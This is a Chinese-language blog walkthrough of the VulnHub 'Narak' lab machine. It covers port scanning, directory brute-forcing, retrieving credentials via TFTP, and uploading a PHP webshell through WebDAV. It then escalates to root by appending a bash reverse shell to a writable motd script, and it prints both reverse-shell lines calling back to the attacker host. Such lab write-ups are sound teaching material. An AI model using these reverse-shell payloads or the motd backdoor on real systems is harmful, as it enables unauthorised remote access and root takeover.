VulnHub-Narak靶机笔记

Narak靶机笔记

概述

Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识

靶机地址: https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwd=a7kv

提取码: a7kv

当然你也可以去Vulnhub官网下载

一、nmap扫描

1)主机发现

sudo nmap -sn 192.168.84.0/24
Nmap scan report for 192.168.84.130
Host is up (0.00026s latency).
MAC Address: 00:0C:29:38:2B:28 (VMware)

看到192.168.84.130是靶机ip

2)端口扫描

a) TCP端口

sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:38:2B:28 (VMware)

# Nmap done at Fri Sep 20 11:59:44 2024 -- 1 IP address (1 host up) scanned in 1.91 seconds

b) UDP端口

sudo nmap -sU --top-ports 20 -o udp 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00066s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:38:2B:28 (VMware)

# Nmap done at Fri Sep 20 12:01:21 2024 -- 1 IP address (1 host up) scanned in 7.99 seconds

看到69号tftp可能是开放的,一会可以看看有没有什么可以传输的文件

3)详细信息扫描

sudo nmap -sT -sV -sC -O -p22,80 -o details 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00077s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 71bd592d221eb36b4f06bf83e1cc9243 (RSA)
|   256 f8ec45847f2933b28dfc7d07289331b0 (ECDSA)
|_  256 d09436960480331040683221cbae68f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: NARAK
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:38:2B:28 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 12:00:51 2024 -- 1 IP address (1 host up) scanned in 8.02 seconds

二、web渗透

打开 80端口
image

没有什么有价值的信息,我们进行目录爆破

1)目录爆破

sudo gobuster dir -u http://192.168.84.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,rar,txt,sql
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.84.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,sql,zip,rar
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.84.130/images/]
/tips.txt             (Status: 200) [Size: 58]
/webdav               (Status: 401) [Size: 461]
/server-status        (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

看到几个目录和文件被扫描了出来,我们全部打开看看

image-20240921114102749

在tips.txt中,他说打开narak的提示可以在creds.txt中找到。但是我们现在并不知道creds.txt在哪里

接着看webdav

image-20240921114441008

他需要认证,我们并没有有效地凭证信息

三、tftp渗透

在udp扫描中,我们看到了tftp端口可能是开放的,而我们在tips.txt文件中看到了一个存在creds.txt文件的信息

尝试一下

tftp 192.168.84.130

image-20240921115715361

tftp是一种简单的文件传输协议,比较小巧,搭建也很方便。他不能列出系统文件,只能进行一些简单的文件操作

get creds.txt

image-20240921120030280

cat creds.txt 
eWFtZG9vdDpTd2FyZw==

看到是类似于base64加密,解秘看看

cat creds.txt | base64 -d
yamdoot:Swarg  

发现了一组凭据yamdoot:Swarg

四、获得立足点

拿到凭据肯定要尝试ssh登陆

image-20240921120612189

看到这并不是ssh的凭证,那会不会是webdav的呢?

尝试登陆webdav

image-20240921120737068

成功登陆

用davtest测试以这个webdav服务

davtest -url http://192.168.84.130/webdav -auth yamdoot:Swarg
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.84.130/webdav
********************************************************
NOTE    Random string for this session: _8C8yvKn
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.84.130/webdav/DavTestDir__8C8yvKn
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.txt
EXEC    txt     FAIL
EXEC    jsp     FAIL
EXEC    html    SUCCEED:        http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.html
EXEC    html    FAIL
EXEC    asp     FAIL
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    pl      FAIL
EXEC    cfm     FAIL
EXEC    cgi     FAIL
EXEC    shtml   FAIL
EXEC    php     SUCCEED:        http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.php
EXEC    php     FAIL
********************************************************

看到是可以解析php文件的,构造php_reverse.php

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.84.128/4444 0>&1'"); ?>

cadaver,这是webdav服务的客户端

image-20240921122315816

image-20240921122338650

看到上传成功

kali本地监听,并在浏览器访问php_rev.php

image-20240921122623325

成功获得立足点

五、提权到root

通过查看可写文件,找到了一些令我们感兴趣的

find / -writable -type f -not -path '/proc/*' -not -path '/sys/*'  2> /dev/null

image-20240921131413327

看到sh文件和motd文件

motd(Message of the Day)文件用于在用户登录 Linux 系统时显示欢迎信息或通知。它通常用于向用户提供系统信息、公告、或其他登录时需要注意的事项。

cat hell.sh
#!/bin/bash

echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

看到了一串beef字符串,复制到hell文件中,解密

image-20240921130012583

看到了明文信息,去碰撞一下ssh

image-20240921130118856

一共有三个用户,把用户放到users文件,chitragupt放到pass文件

image-20240921130409005

用ssh登陆进去

image-20240921131615806

直接去motd文件下吧

image-20240921131948177

这里可以在00-header文件中添加我们的提权逻辑

echo -e "bash -c \"bash -i >& /dev/tcp/192.168.84.128/8888 0>&1\"" >> 00-header

在kali中监听8888端口,并重新ssh登陆inferno用户

image-20240921135011973

看到#提示符,提权到了root权限

总结

  • 通过nmap扫描,我们发现22,80的TCP端口是开放的,udp的69端口tftp服务可能是开启的
  • 进行目录爆破发现目标机器有webdav服务,并且知道了目标有creds.txt文件。
  • 利用tftp协议拿到了creds.txt,里面记录了webdav的凭证信息,成功登陆webdav
  • 利用cadaver这个webdav客户端,上传php反弹shell,成功获得了立足点。
  • 翻找系统可写文件,发现了一个sh和motd文件,查看sh文件猜测是一个用户的ssh凭证,用hydra成功爆破出ssh的凭证
  • 用motd的00-hearder文件的逻辑完成了提权操作
posted @ 2024-09-21 14:21  Ling-X5  阅读(22)  评论(0编辑  收藏  举报